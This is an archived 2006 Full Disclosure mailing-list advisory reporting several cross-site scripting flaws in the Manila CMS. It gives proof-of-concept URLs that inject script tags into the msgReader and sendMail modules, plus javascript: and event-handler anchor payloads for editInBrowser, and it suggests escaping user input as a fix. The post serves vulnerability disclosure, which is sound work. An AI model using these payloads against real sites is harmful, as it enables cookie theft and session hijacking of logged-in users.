Full Disclosure mailing list archives
Manila.userland.com XSS'able
From: aaron <aaron () lo-res org>
Date: Sat, 15 Apr 2006 12:04:15 +0200
Manila from manila.userland.com is a widely deployed CMS _ _ (http://http://manila.userland.com/selectedCustomers) \`\ /`/ \ V / This following cross site scripting exploit was sent to /. .\ userland.com on the 2nd of April. =\ T /= / ^ \ Happy easter-hacking, live from the easterhegg {}/\\ //\ (http://eh.cngw.org) __\ " " /__ jgs (____/^\____) --- snip -- original post to manila-bugs () userland com follows ----
Multiple XSS bugs in manila. To: manila-bugs () userland com Authors: Michael Bauer <mihi () lo-res org>, Aaron Kaplan <aaron () lo-res org> This bugs will be reported to you and released to the public 10 days after submission to userland.com, as we strongly believe in full disclosure. Software: manila Vendor: userland.com Versions tested : <meta name="generator" content="UserLand Frontier 9.0.1"> Overview: Manila is vulnerable to several XSS injections which can be abused to steal a cookie from a logged in user. This means taking over his session doing stuff in his name. Details: In the module "msgReader" -------------------------- proof of concept: http://manila.userland.com/discuss/msgReader$1?mode=%22%3E%3Cscript%3Ealert('XSS!')%3C/script%3E in the module "sendMail": -------------------------- proof of concept: http://profiles.userland.com/sendMail?usernum=2500&referer=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E in the module "editInBrowser" ----------------------------- explanation: it is possible to use <a> and other html tags to put javascript instructions into the webpage examples: <a href=javascript:alert('xss!')>click here</a> <a href=# onmouseover="alert('xss!')">click here</a> <a href=# onmouseout="alert('xss!')">click here</a> demo can be seen on http://mana.manila.at/discuss/msgReader$15?mode=day as we got an account there. Workaround: htmlescape all user input! if you want to accept html as input write your own html parser for a limited html subset. Disclaimer: For educational purposes only, we are not responsible to any harm produced by the security hole we published.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Manila.userland.com XSS'able aaron (Apr 15)